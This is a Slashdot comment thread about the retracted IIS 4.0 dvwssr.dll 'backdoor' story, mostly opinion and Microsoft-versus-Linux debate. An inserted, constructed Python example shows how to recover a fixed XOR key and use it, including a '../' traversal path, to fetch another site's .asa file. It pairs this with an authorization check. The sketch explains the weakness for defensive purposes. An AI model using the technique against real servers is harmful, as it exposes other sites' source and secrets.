Microsoft IIS4 Backdoor Claim Retracted
maniack writes: "According to NTBugtraq, the latest reports say that there is no back door in IIS 4.0. As ArsTechnica points out, the story has apparently been blown out of proportion by the press and no security hole exists. " So - anyone know what's /really/ the case? We've got reports from both sides, but it sounds like it's not true now.
Oooh hey---it's the first Microsoft "vaporbug". Lots of press releases spinning the story, but MS doesn't deliver. Jeez. Typical ;-)
----
Am I the only one who thinks Microsoft is a misnomer? Perhaps Macrosoft would be a better fit?
Heh, maybe "no security hole exists" in this certain case, but Frontpage is riddled with insecurity like a block of swiss cheese.
Mike Roberto (roberto@soul.apk.net) - AOL IM: MicroBerto
Berto
Don't try to fix the bug, for that is impossible. You must realize the truth: there is no bug.
I'm going to live forever or die trying.
We should try to make Linux and opensource look better instead of trying to make its competitors worse. I'm getting sick of all the Microsoft crap on /.
I likes the techie stuff. Gimme!
-- Kirk S
A plot by the Redmond Cabal (tm) (now with ActiveHex) to discredit Eric Raymond!
Eh, who knows/cares, really.
It doesn't affect me either way.
Well, you have to admit bashing Microsoft is almost a national pastime around Linux users.. Sometimes, you just have to think though.. What OS did you start on, when you first touched a PC? For me, it was DOS, of course.. which was made by Microsoft.. not saying that actually bears relation to it, but that they DO make good software at times. Although, come to think of it, who the heck uses Win2000 anyway? Win98 is more stable.. but that's like comparing the two crappiest bands in the place; which one's better? Who cares? C'mon, let MS have a SMALL break. I'm sure they were just having fun.. and in reference to a post about replacing the 404 error with a Netscape-bashing item, that would probably cause even more uproar. (Then again, it could be INCREDIBLY funny.) -- Daddy, what does FORMATTING DRIVE C mean?
My theory is that one of the lower managers recognized the backdoor/bug and did the right thing by reporting it so it can be dealt with. Then upper management decided they didn't like the bad publicity and decided to cover it all up. All of a sudden it wasn't REALLY a back door, just a little problem for a few people. uh huh. I'm convinced. Then again, it's just a theory and I can't back it up.
/*--Why can't I find the QNX OS on any warez sites?
* (above comment useless as of 4-26-2000)
*/
Why is the string there? It's been found in more than one file. There's gotta be a reason it was placed there. Unless if MS hired someone who was going insane.
Do we get an ESR apology as the next story? :-)
Be thankful you are not my student. You would not get a high grade for such a design
Restores a lot of faith after the ESR article. And no, I don't mean any of this in a snotty way. Thanks.
As to the real deal, I was under the impression that there really is a hole, just no backdoor, and way less serious than originally thought.
My own quick summary: If multiple web sites are hosted on a NT4/IIS4 server with FrontPage 98 extensions installed, then webmaster A with web authoring permissions on his own site could potentially inappropriately read the .asp (and possibly the global.asa, but no others) files of webmaster B's web site if he knew where they existed on the same server. Note that to be able to do this, user B would have had to have granted user A read permissions (explicitly, or by giving read access to "Everyone") on those files -- otherwise, user A would be unable to read the files.
There's also the buffer overrun, although I don't know if anyone has successfully been able to exploit yet.
Bottom line: Just delete the dang dvwssr.dll. Do not pass GO, just delete it. I don't know a single person still using Visual Interdev 1.0, and even then you'll just lose the "Link View" feature. I could care less if they ever release a fixed version of this nasty DLL.
Cheers,
ZicoKnows@hotmail.com
Maybe "no security hole exists" in the article above should be rephrased "this particular security hole is phony." It's Microsoft, after all.
released perl exploit for it that works, so i guess that bug (backdoor) IS there.
i know linux geeks sometimes get into hype too much, but that is no reason to use *bad* words in posts (see VA post above:)
Read this. This is the actual security alert from bugtraq. I've learned not to trust slashdot's security reporting. It tends to be rather uh biased. ESR does security news. Oh yay.
Ian
Wonder how that link from the word contact got in there ;-)
Congratulations, you have murdered Slashdot by bowing to corporate pressure and introducing subscriptions
How often does it happen that the press actually gets their facts straight? Does it feel weird that in this case the story has changed so quickly? First it's a BACKDOOR MAMAAAA help. Then, it's a bad BUG. Then it's nothing at all:
-There is nothing to see here, folks, just go on with your business, there is nothing going on here, nothing at all! Can't we all just get along!
Micro$oft has lots of money (BTW. WTF. Why Isn't /. talking about the latest HIT on TECHSTOCKS? Is it because Linux suffered a lot?) so Microsoft has the money to make everyone go on with their business and shut their mouths.
I wonder how much (intangible costs) will MS pay for this blunder?
You can't handle the truth.
Tell me: if someone had made the same claim (hidden backdoor) about Apache, would you have been as quick to believe it? The fundamental answer (which is the point Eric was making) is "No."
-russ
Don't piss off The Angry Economist
Anyone else getting a little annoyed that slashdot has now posted !3! articles pertaining to this? It's getting old REAL fast. Who cares, IIS has tons of bugs, so why post this. You don't post LINUX bugs, you don't post NT bugs. NO ONE CARES. Next Catz' is gunna do a From IIS's Mouth series about teens and how IIS destroyed their lives.
SB.
..so it may not be a backdoor. 2 questions remain:
#1, WTF is that string doing in this dll?
#2, Can Netscape sue for libel?
Since you appear to be the only person doing this work, I suggest you give up the futile effort.
You're getting out what is now *NON-INFORMATION*, which could have been real information, and might have had an effect if you:
A) hadn't broadcasted it with an unnecessarily hateful and spiteful tone and
B) hadn't spammed the article.
Now you'll get moderated down as redundant in all of your posts, instead of getting rated up as insightful. Conflicting viewpoints are not always moderated down. Rarely in fact, and those that do are brought back up and meta moderation takes care of the moderator. Except when you take your role of "town asshole" and everyone gladly takes a shit on you.
Next time, think your "comment" out a bit better, and make sure you leave the unnecessary "fuck the moderators", "this will be moderated down", preaching to the "Trolls of the world", and calling everyone "linux losers" out and maybe people won't be so quickly repulsed.
Someone who immediately comes off as hostile who rants and raves with only a MINIMALLY apparent reason isn't likely to be taken seriously. You are one of those people. Enjoy, as you may have had a message, but screwed yourself.
But that is the annoying thing about Microsoft. Whenever there is even a fake report, they've had such a bad history of denying bugs for days, weeks or even months (I'm still bitter about DOS 6.0....) that when stuff like this happens, you have to take it seriously if you are using their products. It gets awfully frustrating.
Sure, *now* we can say it was probably nothing, but for a while, folks running IIS had to be worried, and waste time and money fixing the problem. The problem didn't exist, but because of Microsoft's unreliable history, people couldn't give them the benefit of the doubt.
Dana
See what Microsoft has to say for questions about the vulnerability. They have found (or been informed of) another vulnerability with the same file and the same remedy (delete the file). The link says that there isn't a backdoor, but it doesn't proclaim the whole security issue as bunk. Obviously, there *are* security issues involved here.
I like Slashdot, let me say this first. I find it informative, insightful, interesting and very often, funny (hey, that's +4!). However I find many things disturbing. From time to time I see the term 'serious journalism' bandied about on Slashdot. I have to state: I don't consider Slashdot serious journalism. I find it a great place to find new and interesting information. I find it a good place to get some really insightful perspectives. But that's really from the Slashdot community. Not from the Slashdot editorial staff. The editorial staff, I think have their own agenda.
Slashdot = Pro-Linux, pro-Open Source, right? Slashdot = Anti-Microsoft. Though it seems to be anti-corporatism, I find that to be less evident.
Many of Slashdot's "celebrities" are Open Source community's big names. It's no secret that Linux and Open Source are the "darlings" of the technology world right now, to some extent. It's also no secret that many of these people have vested interest in companies that base its business on Linux and/or Open Source Software based products.
What I find, then, is that Slashdot's agenda is: 1. Praise Linux, praise Open Source. 2. Get the Linux and Open Source community to all pat each other in the back for being defenders of the free software world. 3. Get rich off of the companies that they have vested interest in.
What this means to me, in a twisted way (I'll admit it's twisted) is that the Community (I'm lumping Slashdot, Linux and Open Source together, rather unfairly too, I know, but I'm doing it anyway) has become an Open Source Microsoft corporation. Think about it. Here are the parallels:
1. Linux = Windows whatever.
2. Open Source Community = Microsoft Developers.
3. Slashdot (and other places) = Microsoft marketing machine.
I'm sure there are many others. But this is what I could think of.
So in a sense, it is distributed (don't we love that word!) corporatism, to some extent. It's a bit of a stretch there, but I think you may see my point. Just because the vested interest is in a bunch of companies doesn't mean that it's not corporatism. The point of corporatism is bottom-line. I don't think that it's so different in the companies that have products based on open-source.
In all fairness, I believe that Open Source has its roots in for-honest-goodness, but I think that the term has now been used for many self-serving people and companies with an agenda to use it as a marketing term.
And in this respect, the largest target for the Community has always been Microsoft. The Community is competing against Microsoft for market share. The Community hides behind "Open Source" as a Good Thing(tm). I find it extremely distasteful the feeding frenzy of every misstep and mishap of Microsoft. I don't love Microsoft, but I find this kind of behavior turns me off to the Community. And I absolutely believe that many are jumping on this bandwagon to bash Microsoft so that the best alternative to Microsoft, Linux and Open Source based products, will win out so that their own vested interest will make them rich. How disillusioning.
That was my first computer. After that, I had an Apple //e with Apple ][ DOS 3.3, and later ProDOS.
Hey, I was nerd before nerd was cool. :)
The point is the same...DOS wasn't the first computer for many of us. Even in the cases where it was, is that a sign of it not sucking ass? My first computer was a piece of crap in most ways! I have no allegiance to TI because of that computer, nor will I cut them any slack. I'm an engineer. I rave over the best technology. All else is vanity.
Vuln-dev FAQ
We've been discussing this on the vuln-dev mailing list. Here are the relevant threads:
Has anyone verified whether is is valid?
Re: dvwssr.dll (Has anyone verified whether is is valid?)
So far, consensus is that the hole, as first published by RFP, is a little misleading. It looks like a number of Frontpage servers out there may be misconfigured permission-wise, so that using his code will allow grabbing of .asp files and such off the server. Some folks think that under the same circumstances, the same could be done with a copy of Frontpage.
Now, there is a worse hole that the CoreSDI guys have found:
DVWSSR.dll Buffer Overflow Vulnerability in Microsoft IIS 4.0 Web Servers
It's an unrelated hole, that was inspired by RFP's post.
RFP is a pretty sharp guy, so it's very likely he's onto something. It's possible that he overstated things a bit due to default permissions (which means 90% of the sites ARE vulnerable) but I wouldn't write off his work entirely. There will be more to this story Real Soon Now.
In either case, with two major problems related to the same .dll, and a huge embarrassment for MS, you WILL see this file patched. :)
And let's not forget MS's word on the subject:
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp
BB
Simple. They didn't intend to. Some programmer could have decided to add one in of their own free will. If they did add one, would you know? How? If they TOLD you would you buy it? No. You stated that yourself. But what if they didn't? Let's hope UCITA isn't passed in your state...
Most all Microsoft products do not include their source code. Had they inserted a backdoor no one would know, or been able to find out with any relative ease. With opensource, said backdoor would never have been allowed into 90% of *nix systems. (the last 10% are suckers who installed untrustworthy binaries from some punk and run 24/7 as root).
There are some corporations that don't intend to make the best product they can and sell it. They compete viciously, sometimes illegally, to crush competition to the point that they don't have to make the best to make money because they can make lots of money selling something that is far from the best they could do (whew!), since there is (or, has been) no option to turn to. Linux/*BSD, quite simply, is going to be near impossible for them to crush, if it can be crushed at all. Let's hope this forces changes.
Slashdot must be right! Microsoft is an evil corporation which only exists to let people break into your computer and see your pr0n!
Acting like an ass doesn't help you.
why would anyone moderate this up? it's a troll. there are real reasons for IPOs, particularly Linux IPOs, to yo-yo, and none of those reasons have to do with VA Linux, ESR, or Linux itself.
The whole market just took a plunge -- after years of clockwork growth. Tech stocks were hit hardest -- particularly recent IPOs, dot-coms, and other computer/IT related stocks. Clearly, interest rates are going to skyrocket, just as all indicators show inflation on the rise. The party's over, folks. It's going to take something earth-shaking (fundamental Fusion/Physics/Science breakthrough) to pull this one out.
Even worse, the recent tech IPOs of RedHat, VA, Caldera, MP3 were started off with unsophisticated "geek" buyers. People who are basically ignorant of anything except the net investing all they had for a quick buck. The institutions quickly followed suit, and everyone bailed out once they saw the peak.
This chump should give it a rest with the Linux bashing, ESR should do his homework before making BS posts, and moderators, KINDLY PULL YOUR HEAD OUT OF YOUR ASS. This guy is either a troll or pathetically ignorant of the stock market, or (most likely) both.
Treatment, not tyranny. End the drug war and free our American POWs.
See my user info for links.
from this note on Microsoft's site, it seems that the phrase was being used as an "obfuscation key" for filenames in HTTP requests involving this component (probably using an XOR scheme, or else they would have called it encryption).
What's happened to Slashdot?
I'm not talking about the error; the correction was prompt and quick. I'm talking about the Trolls.
We've always had trolls. But now it is just crazy.
What prompts people to behave like this on web forums? Do those of us who don't want trolls, do we need to go elsewhere?
How much fun would it be to Troll a forum no one reads?
Sorry for posting off-topic, Slashdot used to be a much nicer place to visit. I think the threshold has been breached; AC posting must go. Perhaps temporarily.
And I used to be a strong supporter for AC posting too. But the rewards no longer outweigh the problems, not when it is like this.
Whatever will we do?
The sad thing is that most people would believe anything about microsoft products when it comes to bugs or backdoors... why? well, they do have a record for having them. Maybe Microsoft should really take a look at the public perception of their software. People use their software, but don't trust the company they buy it from.
Such is the order of things today...
It's spelt "L-I-N-U-X", but pronounced as "Free Beer"
First "home" computer: UCSD P-System on a Sage II hardware. I then moved up to UNIX System V.2 on a Stride 440. I didn't have an IBM compatible PC till the 90's and then only because I could install Linux on it. With the exception of work I don't use MS Windows and even then it's only because they make me. I'm much happier with any UNIX workstation on my desk than I am with a Windows PC.
BTW, have any of you guys tried this command on the linux kernel tree before??
# cd /usr/src/linux
# egrep -i "fuck|shit|damn" `find . -name '*.c'` 2>/dev/null
It's quite amusing.. It's there.. but I can guarantee that you will not find an INTENTIONAL security hole in the linux kernel.
Ryan Wyler
The parent to this post is the one post on this entire article that is ACTUALLY RELEVANT and has a lot of meaty, relevant links.
--Joe--
Program Intellivision!
Reminds me of the XOR encryption Micros~1 used with synchronization between Windows CE and NT. In that case, the obfuscation key was susageP, Pegasus backward. (Pegasus was the code name for the project that became CE and is not connected with Pegasus Mail.)
Will I retire or break 10K?
I believe the AMA will be recognizing it as a disease soon, and will hopefully have a pill to counteract its effects by 2005.
Get your troll pills here. If trolls are playing Vitamins on their boxen, they can't be trolling /. at the same time.
The unfortunate thing is that we can't just ignore them either, they will simply try harder to get our attention.
There is a limit as to how hard they will try. Ignore them hard enough (build enough karma to get the +1 bonus, then browse at 2) and they'll stop trying.
Will I retire or break 10K?
Two dlls (dvwssr.dll and mtd2lv.dll) included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack include an obfuscation string that manipulates the name of requested files. Knowing this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download any .asp or .asa source on the system. This includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to potentially gain access to the source of another company's website if hosted on the same physical machine.
If this is true, this is a vulnerability in the environment with multiple users sharing a hosting service (but not with single user as someone probably thought originally).
Anyone disproven this? Or now only vulnerabilities that don't require a local account on the system count as real?
Contrary to the popular belief, there indeed is no God.
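Added example (not part of any comment in this thread, and not Microsoft's code): a sketch of why a fixed "obfuscation key" on requested file names, as discussed in the comments above, gives no protection on a shared host, next to a handler that checks per-site authorization. It assumes a repeating-key XOR, which one commenter only guesses at; the key, site layout, paths and user names are all constructed.

```python
"""Fixed-key XOR on file names is not access control (constructed illustration)."""
import posixpath
from itertools import cycle

# Constructed stand-in for a string compiled into a shipped DLL.
KEY = b"constructed-demo-key"

# Constructed shared-hosting layout: each virtual host has its own authors.
SITE_AUTHORS = {"/siteA": {"alice"}, "/siteB": {"bob"}}


def xor_obfuscate(data: bytes, key: bytes = KEY) -> bytes:
    """XOR every byte with the repeating key; applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(known_plain: bytes, observed: bytes) -> bytes:
    """Known-plaintext recovery: plain XOR obfuscated yields the key stream.

    The shortest prefix that reproduces the whole stream when repeated is the
    key, provided the known text is longer than the key.
    """
    stream = bytes(p ^ c for p, c in zip(known_plain, observed))
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def _decode(obfuscated_name: bytes) -> str:
    """Undo the obfuscation and collapse any ../ segments."""
    raw = xor_obfuscate(obfuscated_name).decode("ascii", "replace")
    return posixpath.normpath(raw)


def handle_key_only(obfuscated_name: bytes) -> str:
    """Weak design: a correctly obfuscated name is the only gate."""
    return "200 " + _decode(obfuscated_name)


def handle_with_authz(user: str, obfuscated_name: bytes) -> str:
    """Hardened design: the authenticated user must be an author of the
    site that owns the normalized path, whatever the obfuscation says."""
    path = _decode(obfuscated_name)
    site = "/" + path.split("/")[1] if path.startswith("/") else ""
    if user not in SITE_AUTHORS.get(site, set()):
        return "403 " + path
    return "200 " + path


def demo():
    """alice authors siteA only; show both handlers on a siteB file name."""
    # One name seen in both forms is enough to derive the key.
    own_path = b"/siteA/pages/products/catalogue/index.asp"
    derived = recover_key(own_path, xor_obfuscate(own_path))

    other = xor_obfuscate(b"/siteB/global.asa", derived)
    traversal = xor_obfuscate(b"/siteA/../siteB/global.asa", derived)
    return (
        derived == KEY,
        handle_key_only(other),
        handle_with_authz("alice", other),
        handle_with_authz("alice", traversal),
        handle_with_authz("bob", other),
    )


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The second handler gives the same answer whether or not the key is known, which is the property the obfuscation alone cannot provide.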
Did anyone try this exploit? I don't have my own IIS server and don't want to steal data from other servers, but if this program is proved to work then the security hole really exists.
It was very easy to verify. As soon as I heard the story, I tried to verify it, by installing IIS, etc, and was unable to.
Looks like the press got suckered in to reporting an urban legend! I hope Bill Gates puts these so-called newspapers out of business for this slanderous coverage.
--- Speaking only for myself,
What if they decided to use for their string something like the following: "I've seen a report compiled by private detectives that detail a very sordid private life by Sun CEO Scott McNealy. It appears that various times within the last 24 months, he has forced subordinates, both female and male -- one a 16-year old high school exchange program coder -- into engaging in sexual acts with him under the threat of losing their jobs. Our source indicates that all employees -- some current employees and some who have departed -- were paid off with a secret discretionary fund controlled by Sun's board of directors."
Now, any reporter making something like that up would get their testes sued off, but what if a company purposely put it into a common library, knowing that it'd be found, just biding time until someone looked at it with a hex editor? Yeah, it's pretty far out there on the realm of possibilities, but I have a hard time believing that a new judge would keep the precedent set by the one you mentioned in such a case.
Cheers,
ZicoKnows@hotmail.com
Eric - what have you to say now. All your 'insights' and 'inspirations' are proven wrong Yeah, facts, unlike your posts. When VA Linux hit $300 on opening day, you all blabbed about how important it was for the linux community. You said "it's nice to see that investors get it!". Well, now that VA Linux is a loser to anyone who still owns shares, what does that say? You said investors 'Got It', and I think you are right, they still get it. Linux is nothing. It's not important. It's insignificant. It's 28 and plummeting fast. You guys get all high and mighty whenever there is pro-linux or anti MS news, where is all your comments about this news? Why the silence? Surely it rates as a story since VA Linux was a story whenever there was any other news about it. Go ahead linux losers, moderate me down. Trolls of the world, copy this message, and make sure it's posted 100 times in each article. We'll get the message out regardless of what the moderator queer linux lovers think
Oh wait... lemme guess. You lost money in stocks and now you need a scapegoat.
Stocks are not a lot different from gambling. You win some you lose some. Get over it and stop whining you ninny.
"Free your mind and your ass will follow"
Netscape software sucks. Even Netscape's parent company AOL admits IE is better. After all, when you subscribe to AOL, you get Internet Explorer.
--- Speaking only for myself,
Why don't we worship the guy that wrote ls instead.
Hmm or better yet how about we all agree to go back to having our own thoughts. Then get back to posting interesting stuff.
Last one in jail is a fascist.
I drive a Honda, and I love my Honda. I do not spend most of my waking hours evangelizing about why Toyotas are inferior cars. I'm content to drive the car I want to drive.
You all have lost sight of the fact that a computer is only a tool. And if you're wise, you will put your biases and prejudices aside and use the best tool for the given application!
Linux [ and open source ] is not always the best solution to a given problem.
The hypocrisy of your animosity is enormous. Would you have a PIII650 with 256MB if it wasn't for Windows being directly responsible for expanding the user base of PC's and thereby lowering the prices for everyone ( that includes you Linux user ).
If you do not like it, do not use it. Your energies would be better spent taking care of the problems in your house instead of sweeping them under the rug.
And, in case you're curious what my tools of choice are: Win2000 ( which works great ) and BeOS ( which works even better! ).
The inability of the older generation to learn from the younger generation is the reason for the gap.
no sig.
I'm sorry if you lost your shirt, or if you have a vendetta, Mr. Oog, but don't you think there is a better way to say this.
And can anyone imagine Micro$oft allowing someone to post these kind of comments about their business on their web site? Repeatedly?
Hopefully I didn't put any [] around my words.
It's really a brilliant scheme; they get so many pageviews from this due to all the inaccurate info that needs to be corrected through so many user messages.
- Jeremy Fuller
If there is no bug, then why did Microsoft ask its customers to delete the dll file? "Shh.. if we tell them there's no bug, then no one will continue looking.."
jeeves, fetch me my weed whaCka.
Hmm you know I might actually like that feature,
ie a maximum score of posts to display. Moderators might like to skim articles and ignore everything that's already high scored and look for new posts to moderate on. It may be useful in fact it keeps all the trolls away from the regular posts, ie trolls reading at a max score of 0, while normal people read at a minimum of 1 or so (that really should be the non-login default minimum btw).
Just my $0.02..
What I find, then, is that Slashdot's agenda is: 1. Praise Linux, praise Open Source. 2. Get the Linux and Open Source community to all pat each other in the back for being defenders of the free software world. 3. Get rich off of the companies that they have vested interest in.
Ah, but the encouraging thing is-- if Slashdot readers consist entirely of backslapping open-source bigots, why was your comment moderated to a +4? Why was the top-rated comment about the `Geek Pride' festival one that said, I think, that meeting Eric Raymond would be `about as enticing as a headwound'? Certainly among the Slashdot Illuminati, there's a strong voice of dissent to the party line.
I get the impression that the majority of the comments you read on Slashdot represent the views of a group of kneejerk reactionary teenagers who, like you do when you're a teenager, are trying to find their niche to fit in. The sometimes heady political atmosphere of Linux advocacy is ideal for this sort of self-definition, gives you something to talk about at parties etc. (but does not, repeat not impress girls, take note. Skateboarding is still good for something. )
Anyhow, I think the guys that run this site do a smashing job of keeping us posted. I don't think they have an agenda, but their attitude, like that of most balanced Linux users, is parallel to Linus' when he said jokingly that the purpose of Linux was to `conquer the world'. Slashdot's stories need to be taken with this sort of tongue-in-cheek comment in mind-- yeah, so MS has a dodgy DLL, big deal we will now inherit the earth bwahahaha... you're hardly meant to take it as serious political commentary. But I think the teeny contingent take it seriously and flood the comments boards with Borg-like efficiency because, well, they're just following a crowd like teenagers do.
Hmmm, bit of a ramble. But you get my drift. I don't think Slashdot is going to be descending into back-slapping hell for a long while, and there are some really incisive, decent comments being moderated up. And let's not let ESR do security reports in future, because although he's written some good essays and software, he does have an annoying habit of posting complete tripe here.
Matthew @ Bytemark Hosting
> of all the thousands of eyes looking at the code, someone will find it quicker than someone will find it in closed programs
An interesting experiment would be to put a comment in some obscure piece of Linux kernel or utility code, saying "This is a survey. If you find this comment, send a message to whoever@wherever, and don't mention it to anyone. In a year I'll report on how many pairs of eyes have spotted it. (P.S. - Let me know if you only have one eye.)"
--
Sheesh, evil *and* a jerk. -- Jade
That's how you tell the first-class OSes from the cheap imitations: the first-class ticket throws in lots of extras that you can delete without doing any harm to the system.
Hey! Anyone up for a game of .dll roulette? Give me an account on your system and then we'll take turns deleting files, and whoever deletes something that makes the system crash loses.
--
Sheesh, evil *and* a jerk. -- Jade
you don't know how much of those ESR (or anyone) sold off
FWIW, Everyone knows how much ESR has sold off: exactly zero shares. He's not allowed to sell any until 6 months after the IPO, which will be in June. At the current rate, VA Linux could be a penny stock by that point, especially after that recent report showing how they were trounced by the competition in the sale of Linux computers. Honestly, by the way that they're dwarfed by the other hardware vendors, companies which are already profitable, what does VA Linux have going for it which would keep this stock from going even lower? They're not looking to turn a profit anytime soon, and today's Wall Street has very little patience for stocks like that.
Cheers,
ZicoKnows@hotmail.com
I'm also aware of the fact that not all of the stuff that comes from MS is THE solution to a problem. The original poster tried to illustrate the fact that people should NOT idealize to the max the technology that is their favorite. Instead, people should keep their eyes OPEN to what is best for the particular problem. This means, besides everybody's favorite piece of software, try to truly convince yourself WHY you would choose for product X if a certain solution is needed.
:). Especially the topic about the certain DLL is funny, how it evolved here into a true devil's tool to hurt people. The reason for that is because MOST people here are too shortsighted: they consider just their favorite piece of software THE solution for EVERY problem.
Sometimes I advise my clients to pick a Unix based solution, sometimes I don't. MS' COM based technology today is my favorite development technology to build with. That doesn't mean I don't look at Linux, *BSD or Solaris.
And that's the point: too much people here start to rant and rave when there is something negative to say about MS, even if it's very small. This site is one of the most hypocrite on the net when it comes to Microsoft, and that's a true entertainment factor to consider so that's why I'm here
Which is sometimes true, but also a lot of times not true.
--
Never underestimate the relief of true separation of Religion and State.
read this page on ntbugtraq.com and you'll find 2 articles about the dll. Read them, and you know what's all about.
--
Never underestimate the relief of true separation of Religion and State.
And if there *had* been such a backdoor in Apache, whoever found it could have posted the code rather than just asserting it, so we'd be *right* not to be quick to believe an unsupported assertion.
Unfortunately, the bottom line still stands. While it might be hard to exploit this hole, the fact that it exists continues to raise serious doubts about the Microsoft QC, and other, perhaps more intentional, inclusions.
What OS did you start on, when you first touched a PC?
Define "PC". If I can use my definition, I first touched AMOS, then RSX-11-M-PLUS (without DCL, thank you), then proprietary horrors like the NEC-8023B's OS (unload the heads, seek, load the heads) and the Hitachi Peach. Later, I tried CP/M-80 (2.0 then 2.2, although I did get to work for a while in 1.4). MS-DOS was an unheralded and generally unwanted ever-growing pile of bandaids lurking in the future. And Windows built on this pile (NT was the best thing to ever happen to Windows, and MS are steadily working around that).
[MS] DO make good software at times.
Define "make". NT is an interesting blend of MICA, OS/2 and some other parts, and you could not clearly prove that Microsoft wrote the majority of the code in it. Most, possibly all, of their useable applications were bought in whole or in part (and in most cases, let the seller beware - think "SpyGlass Systems") the applications were not "made" by MS in the normal sense of the word. Bill actually admitted to getting started by stealing other peoples' (buggy! no change there) code out of rubbish bins at Uni, but now sues people for stealing his. To quote Gus the robot, "Oh, now this is fair...".
Got time? Spend some of it coding or testing
Even if there is no security hole at that, webadmins at M$ software using sites should start to think.
This one was no danger.
Who knows really that there is no other, real, backdoor.
Is it responsible to have a web-site running a time bomb?
Give me an account on your system and then we'll take turns deleting files, and whoever deletes something that makes the system crash loses.
/dev/kickme for the Linux kernel - any write to it "drops a bomb" into the kernel's memory space (outbound dirty disk buffers would be good). You could get nice reactions by making copies of /dev/null with that name, once the word got around. (-:
Microsoft already have something like that. SETUP.EXE, I believe it's called.
In the Bad Old Days, we would take turns writing random words into random locations within a live system's kernel memory space. Last user to write a word wins. The game was called "Bomber" and was written in AlphaBASIC to run on an Alpha Micro AM-100.
Perhaps we should implement
Got time? Spend some of it coding or testing
I drive a Honda, and I love my Honda. I do not spend most of my waking hours evangelizing about why Toyotas are inferior cars. I'm content to drive the car I want to drive.
I drive a Peugeot 504D. I challenge you and your Honda to a duel. In particular, to a joust. (-:
Would you have a PIII650 with 256MB if it wasn't for Windows being directly responsible for expanding the user base of PC's and thereby lowering the prices for everyone
Prophetic. "Would you have cheap fuel if it hadn't been for gas-guzzlers?" I guess what you're trying to say here is that Windows == Edsel, Linux == V-Tech?
BTW, we don't have cheap fuel, it now costs about $5 a gallon in Perth, Western Australia, but most people haven't noticed that because it's sold by the litre here. It also contains enough benzene to defoliate the entire Amazon basin. The parallels with DOS-heritage software are hard to ignore.
my tools of choice are: Win2000 (which works great)
...on selected hardware and with selected applications. Here was I thinking that WINE was bad... oh, well, live and learn. Or just live, it's always your choice. (-:
Got time? Spend some of it coding or testing
(wave hand) These are not the backdoors you are looking for.
What are you, some kinda Chevy or worse yet Dodge Commie?
Come on... Maybe it is not a backdoor... But the fact is -and will remain no matter what they do- that this shows us how insecure closed source applications are... If the purpose of this DLL is not opening up a backdoor... Well, there must be another purpose for calling the Netscape engineers weenies - It must be somewhere else in the code... One more of the infamous MS Easter Eggs? A slightly more perverse and obscure function than what we might imagine? With closed source, we will never know.
Anyway, even if it is just text, I think it shows lack of seriousness for a company as Microsoft...
(What would happen epacsteN were overwritten with 1~sorciM, would we have a working Windows?)
The most probable reason for this being "released" now though is to sell more upgrades, I'm sure.
Tomorrow will be cancelled due to lack of interest
The whole point of the NT Bugtraq community is to help the IT departments of the world spot and repair holes. No one would believe if they "lied" about the bug. I've been a member of the community on NT Bugtraq for almost a year now, and I've seen some very awesome work done by the people there. They are committed to help, and I think so is Microsoft's security response team, which has played a huge role in that community, along with people like Rain Forest Puppy, who really know their stuff.
Let's give them a little more credit, please
--jay
The first OS I used was the BASIC command-line on the TRS-80 "color computer 2".
Of course that thing does say (c) Microsoft when you boot it up...
BTW, did you know that on a TRS-80 you could type anything with the first three letters "dir" and it would interpret it as a dir command? i.e. "dire wolf" and "dirty liar!" would both list the files on your disk.
"I don't care about the Constitution!" --Bill O'Reilly, November 17, 2009
I will state that most Open Source programmers had nothing to do with the feeding frenzy on Slashdot. A few "luminaries" did, but in general they acted upon what information was reported by Microsoft and NTBugTraq. Given that Microsoft itself was calling it a "back door", I can hardly fault ESR for putting out a long essay about the problem.
Finally: To accuse Open Source people of "corporatism" is silly. People who release code under the GPL do so that others *can't* take ownership and hide it from view, which is what corporatism is all about. Yes we get excited when we see our beliefs vindicated, but this has nothing to do with money. It is interesting that many former Microsoft employees, albeit working in other places hundreds of miles away from Redmond, will still defend their former employer, for the exact same reason: pride of ownership. It is "their" product, and they want to tell the world that it's good stuff and that those who criticize it are weenies. No Borg mind-washing required.
About the only lesson we can learn here is that there would have been no story if it were OSS. The Wall Street Journal would have contacted a local security guru, who would have looked at the source code of the module in question, and said "There's no back door there." No story. The only reason there was a story was because only one company had the source code to this module -- Microsoft -- and the Wall Street Journal had to rely on Microsoft's word. And Microsoft was saying it was a back door.
-E
Send mail here if you want to reach me.
So, in case you haven't read the bug report, the specific password in question is "Netscape engineers are weenies!"
:-)
Oh, I love Microsoft's well-developed sense of responsibility and mature approach to the market
So I guess people are backing off because you have to have publishing rights, but the ugly part is that you only have to have publishing rights to one of the virtual hosts on a server to get all of the .asp(s) from it.
I'll have to peruse the Ars Technica comments to see why they don't consider this a back-door.
Would you buy a frontdoor that looked nice, but with a lock that you did not know was secure? I think this shows very clearly one of the major differences between Open Source and software products created and owned by vendors like MS.
Look, a lot of people were announcing an NT security hole. Slashdot reported it too. Now, I agree that Slashdot should have a team of investigative reporters who have the technical credits to figure out if this is true or not, but that's because I have a very different vision of what Slashdot should be than, say, CmdrTaco. I don't begrudge him his site as it is, but feel it would be much more useful as a validating filter on the poor high-tech reporting that goes on in other outlets.
The story is still up in the air as far as I'm concerned. One guy (who, BTW was not the original discoverer of the exploit) is reporting that Microsoft doesn't think there's an exploit.
I want to see some people grab the exploit script (it's on the real bugtraq) and run it against some test servers with valid permissions. Does it work? How invalid do the permissions have to be? Does the Microsoft documentation lead you down the road of "invalid permissions" for setting up virtual hosts?
Many questions need to be answered before this case is closed....
If you run strings on vbrun.dll you'll find numerous occurrences of
a ||y__p|4z4D34a||y__p|4z44a||y__p|4z4
D34a||y__p|4z4D3D34a||y__p|4z4D34a||y__p|4z4D34
If I didn't already agree with Eric, I wouldn't bother being the VP of OSI. Isn't that obvious *enough*?
-russ
Don't piss off The Angry Economist
Some ideas at the edge of the bell-curve are good ones. The viability of open source software was a strange idea once. Come to that, so was a computer you could pick up. What's on the lunatic fringe today that's next year's best thing?
And some ideas are sufficiently weird that they're best posted anonymously, even at the price of a Coward label and low Karma. Look at some of the AC postings on this topic, which sure sound like they come from /. regulars.
